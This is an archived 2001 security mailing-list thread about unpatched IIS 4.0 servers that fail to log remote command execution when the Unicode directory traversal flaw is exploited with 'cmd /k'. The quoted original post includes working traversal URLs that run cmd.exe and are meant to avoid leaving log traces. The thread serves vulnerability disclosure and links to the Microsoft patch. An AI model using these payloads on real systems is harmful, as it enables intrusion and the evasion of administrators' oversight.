Pablo Aravena said: >The problem looks like this: > > CMD /K [command] Execute a command and "still active" > CMD /C [command] Execute a command and then finished. > > If you execute a cmd.exe?/k request this would be in active state > until his finished this process instead of the cmd.exe?/c request > that finishes the process inmediatly. Because of this the IIS >thatīs > not log the process that has not come to an end. That's right but if an attacker sends a remote request to "cmd /k" no process "cmd" will appear in the webserver's list of processes so this is a unusual behavior because if an local user of the NT box calls "cmd /k" locally that process will appear in the list of processes. In addition, if the attacker calls remotely "cmd /k" his browser will seem waiting for webserver's answer ( that happens because CMD is still running due to the "K" option ) so if he stops the browser ( pressing ESC ) he will stop the "cmd /k" remote process but IIS don't log it. Roberto Alamos M. (theyeat_private) www.350cc.com > > -----Mensaje original----- > > De: ThEye [SMTP:theyeat_private] > > Enviado el: jueves, 20 de diciembre de 2001 0:39 > > Para: vuln-devat_private > > CC: ndr113at_private > > Asunto: sometimes IIS 4.0 don't write logs. > > > > <Hi: > > > > I don't know if this problem is documented but i didn't find anything > > about > > it anywhere. > > > > The problem is the following one: > > > > + Problem: > > When I was playing with "Microsoft IIS and PWS Extended Unicode Directory > > Transveral Vulnerability" ( BugtraqID = 1806 ) I found that if the > > attacker > > uses the "k" option of cmd ( cmd /k ) instead of the "c" option (cmd /c) > > ,IIS 4.0 (with Extended Unicode Directory Transveral Vulnerability) > > sometimes don't write logs of the attacker's activity. > > > > + Implications: > > If an attacker uses this vulnerability to crack a web page or anything, > > eventually no tracks will exist on the attacked server. > > > > + Final: > > In PROBLEM I said "sometimes" because after a high number of requests to > > "cmd /k" , IIS 4.0 write logs of some requests, still I don't know when > > and > > why IIS 4.0 write logs of the "cmd /k" request. > > Anyone that can confirm or refute this please post it. > > > > > > + Exploit: > > I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed > > > > ( without any patch ). > > > > http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir > > http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir > > http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir > > http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir > > > > Result: No tracks on log files. > > > > + More Information: > > 1) Microsoft IIS and PWS Extended Unicode Directory Transversal > > > > http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806 > > 2) Microsoft Patch prmcan4i > > > > http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-U > > S/prmcan4i.exe > > > > Roberto Alamos M. (theyeat_private) > > www.350cc.com
This archive was generated by hypermail 2b30 : Thu Dec 20 2001 - 12:19:33 PST